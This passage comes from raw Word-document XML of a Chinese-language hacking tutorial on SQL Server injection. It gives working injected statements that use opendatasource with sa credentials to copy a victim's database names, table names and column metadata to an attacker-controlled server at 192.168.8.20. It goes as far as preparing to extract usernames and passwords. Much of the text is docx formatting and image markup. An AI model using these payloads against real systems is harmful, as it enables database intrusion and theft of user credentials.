    <w:p w14:paraId="5F586433" w14:textId="77777777" w:rsidR="00A103ED" w:rsidRDefault="00A103ED" w:rsidP="00901209">
      <w:pPr>
        <w:pStyle w:val="ab"/>
        <w:ind w:left="420" w:firstLineChars="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="73CE55C6" wp14:editId="4DBD85A3">
            <wp:extent cx="5357622" cy="1506662"/>
            <wp:effectExtent l="19050" t="0" r="0" b="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5358309" cy="1506855"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D08F3C8"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此时你跑去192.168.8.20的SQL上看一下KU这个表，你会惊奇发现对方所有的库名已经整齐的排好了，图4。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B7D3824" w14:textId="77777777" w:rsidR="00A103ED" w:rsidRDefault="00A103ED" w:rsidP="00901209">
      <w:pPr>
        <w:pStyle w:val="ab"/>
        <w:ind w:left="420" w:firstLineChars="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7ABCB007" wp14:editId="33B9F960">
            <wp:extent cx="3343275" cy="2055495"/>
            <wp:effectExtent l="19050" t="0" r="9525" b="0"/>
            <wp:docPr id="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3343275" cy="2055495"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DDF99EA" w14:textId="77777777" w:rsidR="00A103ED" w:rsidRPr="00CD76A0"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说到这里很多人可能又要担心权限问题了，我可以放心的告诉你，在public权限下也可以用</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD76A0">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>opendatasource</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD76A0">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>这个宏的。那么得到所有的库了，你怎么才能知那个是当前库呢？哈，你把语句换一下不就得了，换成</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="01E0" w:firstRow="1" w:lastRow="1" w:firstColumn="1" w:lastColumn="1" w:noHBand="0" w:noVBand="0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="8522"/>
      </w:tblGrid>
      <w:tr w:rsidR="00A103ED" w14:paraId="78231602" w14:textId="77777777" w:rsidTr="00591D1A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8522" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="162081DF" w14:textId="77777777" w:rsidR="00A103ED" w:rsidRPr="00AD4B9E" w:rsidRDefault="00A103ED" w:rsidP="00901209">
            <w:pPr>
              <w:ind w:firstLine="420"/>
            </w:pPr>
            <w:r w:rsidRPr="00AD4B9E">
              <w:t>insert into opendatasource('sqloledb','server=192.168.8.20;uid=sa;pwd=lcx;database=lcx').lcx.dbo.ku select db_name(0)--</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="75104E4C" w14:textId="77777777" w:rsidR="00A103ED" w:rsidRPr="00CD76A0" w:rsidRDefault="00A103ED"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不就可以了吗？在图4中，bbsuser是我们的注入的当前库，我们来获得当前库的所有表名。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D98B851" w14:textId="77777777" w:rsidR="00A103ED" w:rsidRPr="006472F7" w:rsidRDefault="00A103ED" w:rsidP="00901209">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:snapToGrid w:val="0"/>
        <w:ind w:firstLine="422"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman"/>
          <w:b/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006472F7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:b/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>第二步：得到当前库的所有表名</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36E3B4E6"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语句为：</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="01E0" w:firstRow="1" w:lastRow="1" w:firstColumn="1" w:lastColumn="1" w:noHBand="0" w:noVBand="0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="8522"/>
      </w:tblGrid>
      <w:tr w:rsidR="00A103ED" w:rsidRPr="00CE5A3A" w14:paraId="7E13827F" w14:textId="77777777" w:rsidTr="00591D1A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8522" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="589F9B3E" w14:textId="77777777" w:rsidR="00A103ED" w:rsidRPr="00CE5A3A" w:rsidRDefault="00A103ED" w:rsidP="00901209">
            <w:pPr>
              <w:ind w:firstLine="420"/>
            </w:pPr>
            <w:r w:rsidRPr="00CE5A3A">
              <w:lastRenderedPageBreak/>
              <w:t>insert into opendatasource('sqloledb','server=192.168.8.20;uid=sa;pwd=lcx;database=lcx').lcx.dbo.biao select [id],[name] from sysobjects where xtype='U'--</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="4D822E55"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个语句省略了当前库名，得到就是当前库的所有表名。你也可以把语句换成：</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="01E0" w:firstRow="1" w:lastRow="1" w:firstColumn="1" w:lastColumn="1" w:noHBand="0" w:noVBand="0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="8522"/>
      </w:tblGrid>
      <w:tr w:rsidR="00A103ED" w14:paraId="0A8D6D61" w14:textId="77777777" w:rsidTr="00591D1A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8522" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="163857CF" w14:textId="77777777" w:rsidR="00A103ED" w:rsidRPr="00AD734B" w:rsidRDefault="00A103ED" w:rsidP="00901209">
            <w:pPr>
              <w:ind w:firstLine="420"/>
            </w:pPr>
            <w:r w:rsidRPr="00AD734B">
              <w:t xml:space="preserve">insert into opendatasource('sqloledb','server=192.168.8.20;uid=sa;pwd=lcx;database=lcx').lcx.dbo.biao select [id],[name] from </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>bbsuser.dbo.</w:t>
            </w:r>
            <w:r w:rsidRPr="00AD734B">
              <w:t>sysobjects where xtype='U'--</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="6EA9D928"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来做下测试，语句效果图如图5所示：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04FCD935" w14:textId="77777777" w:rsidR="00A103ED" w:rsidRDefault="00A103ED" w:rsidP="00901209">
      <w:pPr>
        <w:pStyle w:val="ab"/>
        <w:ind w:left="420" w:firstLineChars="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="00A0A308" wp14:editId="2D9B2480">
            <wp:extent cx="5644135" cy="1572768"/>
            <wp:effectExtent l="19050" t="0" r="0" b="0"/>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srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5644591" cy="1572895"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="73257B86"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此时，我们再跑到192.168.8.20去看lcx.dbo.biao这里的数据，你会看到什么？图6</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0000C981" w14:textId="77777777" w:rsidR="00A103ED" w:rsidRDefault="00A103ED" w:rsidP="00901209">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="33D41DFD" wp14:editId="6B8F4FEE">
            <wp:extent cx="4286885" cy="1323975"/>
            <wp:effectExtent l="19050" t="0" r="0"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srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4286885" cy="1323975"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="393F1D39"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是不是我们已经获取了当前库的所有表名呢？好学的你肯定又要问了，那么我如何获得其它库的所有表名呢？很简单呀，基本语句格式如下：</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="01E0" w:firstRow="1" w:lastRow="1" w:firstColumn="1" w:lastColumn="1" w:noHBand="0" w:noVBand="0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="8522"/>
      </w:tblGrid>
      <w:tr w:rsidR="00A103ED" w14:paraId="4E67FFCA" w14:textId="77777777" w:rsidTr="00591D1A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8522" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4550F8DD" w14:textId="77777777" w:rsidR="00A103ED" w:rsidRDefault="00A103ED" w:rsidP="00901209">
            <w:pPr>
              <w:ind w:firstLine="420"/>
            </w:pPr>
            <w:r w:rsidRPr="00AD734B">
              <w:t xml:space="preserve">insert into opendatasource('sqloledb','server=192.168.8.20;uid=sa;pwd=lcx;database=lcx').lcx.dbo.biao select [id],[name] from </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>库名</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>.dbo.</w:t>
            </w:r>
            <w:r w:rsidRPr="00AD734B">
              <w:t>sysobjects where xtype='U'--</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="06CCC97E"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里的库名我们在第一大步已经猜出来了。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="795AA9D5" w14:textId="77777777" w:rsidR="00A103ED" w:rsidRPr="006472F7" w:rsidRDefault="00A103ED" w:rsidP="00901209">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:snapToGrid w:val="0"/>
        <w:ind w:firstLine="422"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman"/>
          <w:b/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006472F7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:b/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>第三步：获取列名</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26324006"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图6中看没有看到，我们获得的第一个列名是bbsuser，其ID值是357576312</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD76A0">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD76A0">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>。有了这两条信息，我们来获取列名吧。在获取列名之前，我们要在192.168.8.20上先做一步</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD76A0">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>工作，复制一个系统表结构。在我先前建好的lcx库中执行语句：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70CEF287"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 into [tmpcolumns] from syscolumns where 1=2</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD76A0">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>,这样会把系统表</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD76A0">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>syscolumns</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD76A0">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>的结构复制给</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD76A0">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>[tmpcolumns]</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD76A0">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>。做法示例图7。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E3B28C4" w14:textId="77777777" w:rsidR="00A103ED" w:rsidRDefault="00A103ED" w:rsidP="00901209">
      <w:pPr>
        <w:pStyle w:val="ab"/>
        <w:ind w:left="420" w:firstLineChars="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="73FA5DEC" wp14:editId="66F22416">
            <wp:extent cx="5376545" cy="1602105"/>
            <wp:effectExtent l="19050" t="0" r="0" b="0"/>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5376545" cy="1602105"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E97CDA1" w14:textId="77777777" w:rsidR="00A103ED" w:rsidRDefault="00A103ED" w:rsidP="006472F7">
      <w:pPr>
        <w:ind w:firstLineChars="0" w:firstLine="420"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="30B87EF1" w14:textId="77777777" w:rsidR="00A103ED" w:rsidRPr="006472F7" w:rsidRDefault="00A103ED"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来获取bbsuser这个表的所有列名，因为ID值是</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD76A0">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>357576312</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD76A0">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>，所以我们的语句是：</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblInd w:w="675" w:type="dxa"/>
        <w:tblLook w:val="01E0" w:firstRow="1" w:lastRow="1" w:firstColumn="1" w:lastColumn="1" w:noHBand="0" w:noVBand="0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="7853"/>
      </w:tblGrid>
      <w:tr w:rsidR="00A103ED" w14:paraId="381A3AE1" w14:textId="77777777" w:rsidTr="00DF773E">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7847" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="30EABB25" w14:textId="77777777" w:rsidR="00A103ED" w:rsidRDefault="00A103ED" w:rsidP="00901209">
            <w:pPr>
              <w:ind w:firstLine="420"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">insert into opendatasource('sqloledb','server=192.168.8.20;uid=sa;pwd=lcx;database=lcx').lcx.dbo.tmpcolumns select * from </w:t>
            </w:r>
            <w:r>
              <w:cr/>
              <w:t>syscolumns where id=357576312--</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="6151ABAB"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注入效果如图9所示：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1533A879" w14:textId="77777777" w:rsidR="00A103ED" w:rsidRDefault="00A103ED" w:rsidP="00901209">
      <w:pPr>
        <w:pStyle w:val="ab"/>
        <w:ind w:left="420" w:firstLineChars="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="725F5BD9" wp14:editId="4F537756">
            <wp:extent cx="5947410" cy="1367790"/>
            <wp:effectExtent l="19050" t="0" r="0" b="0"/>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srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5947410" cy="1367790"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="79D2EC44"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再回到192.168.8.20上来看一下</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD76A0">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>lcx.dbo.tmpcolum</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD76A0">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>这个表，里边是什么内容（图10）：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BBEE364" w14:textId="77777777" w:rsidR="00A103ED" w:rsidRDefault="00A103ED" w:rsidP="00901209">
      <w:pPr>
        <w:pStyle w:val="ab"/>
        <w:ind w:left="420" w:firstLineChars="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="50160079" wp14:editId="771D00D0">
            <wp:extent cx="5596255" cy="1697355"/>
            <wp:effectExtent l="19050" t="0" r="4445" b="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srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5596255" cy="1697355"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="55264260" w14:textId="77777777" w:rsidR="00A103ED"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看到了吧？得到了bbsuser的所有列名，还有列名的一些其它信息。这里的其它信息也是有用的，给我们下一步获得字段值的工作做好了准备。这里我只解释图10中的两个列名</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD76A0">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>的意思。其中length是你获取的列名的长度，xtype是你获取的列名的类型。也许你要问了，为什么获取的类型怎么都是56、175这样的数字呢？ 我查了一些资料，找到了数字与类型对应的关系，关系表如下：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37CD4EEB" w14:textId="77777777" w:rsidR="003C6168" w:rsidRDefault="003C6168" w:rsidP="003C6168">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:t>when 34 then ''image''</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A595261" w14:textId="77777777" w:rsidR="003C6168" w:rsidRDefault="003C6168" w:rsidP="003C6168">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:t>when 35 then ''text''</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FBA383E" w14:textId="77777777" w:rsidR="003C6168" w:rsidRDefault="003C6168" w:rsidP="003C6168">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:t>when 52 then ''smallint''</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="160C76AC" w14:textId="77777777" w:rsidR="003C6168" w:rsidRDefault="003C6168" w:rsidP="003C6168">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:t>when 56 then  ‘int''</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77315748" w14:textId="77777777" w:rsidR="003C6168" w:rsidRDefault="003C6168" w:rsidP="003C6168">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:t>when 61 then  ''datetime''</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AEE6B34" w14:textId="77777777" w:rsidR="003C6168" w:rsidRDefault="003C6168" w:rsidP="003C6168">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:t>when 62 then ''float''</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67938214" w14:textId="77777777" w:rsidR="003C6168" w:rsidRDefault="003C6168" w:rsidP="003C6168">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:t>when 108 then ''numeric''</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20F23174" w14:textId="77777777" w:rsidR="003C6168" w:rsidRDefault="003C6168" w:rsidP="003C6168">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:t>when 167 then ''varchar''</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="065FF01B" w14:textId="77777777" w:rsidR="003C6168" w:rsidRDefault="003C6168" w:rsidP="003C6168">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:t>when 175 then ''char''</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="298B01CB" w14:textId="77777777" w:rsidR="003C6168" w:rsidRPr="00CD76A0" w:rsidRDefault="003C6168" w:rsidP="003C6168">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:snapToGrid w:val="0"/>
        <w:ind w:firstLine="420"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>when 231 then ''nvarchar''</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54D0953F" w14:textId="77777777" w:rsidR="00A103ED" w:rsidRPr="006472F7" w:rsidRDefault="00A103ED" w:rsidP="00901209">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:snapToGrid w:val="0"/>
        <w:ind w:firstLine="422"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman"/>
          <w:b/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006472F7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:b/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>第四步：获取字段值</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60FA7D2F"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有了注入数据库的当前库名、表名、列名的所有信息后，我们就可以获取这段值了。我们先在192.168.8.20上根据在图10中获得的信息在lcx这个库来建一个新表bbsuser，列名分别是id(int类型长度是4)、username(char类型长度是10)、password(char类型长度是10)。如果你不明白这步，你仔细看一下图10和那个数字与类型的对照表。我在192.168.8.20的企业管理器上已经建好了，如图11所示：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04A1521D" w14:textId="77777777" w:rsidR="00A103ED" w:rsidRDefault="00A103ED" w:rsidP="00901209">
      <w:pPr>
        <w:pStyle w:val="ab"/>
        <w:ind w:left="420" w:firstLineChars="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2EB52A1E" wp14:editId="771D92CB">
            <wp:extent cx="3416300" cy="1894840"/>
            <wp:effectExtent l="19050" t="0" r="0" b="0"/>
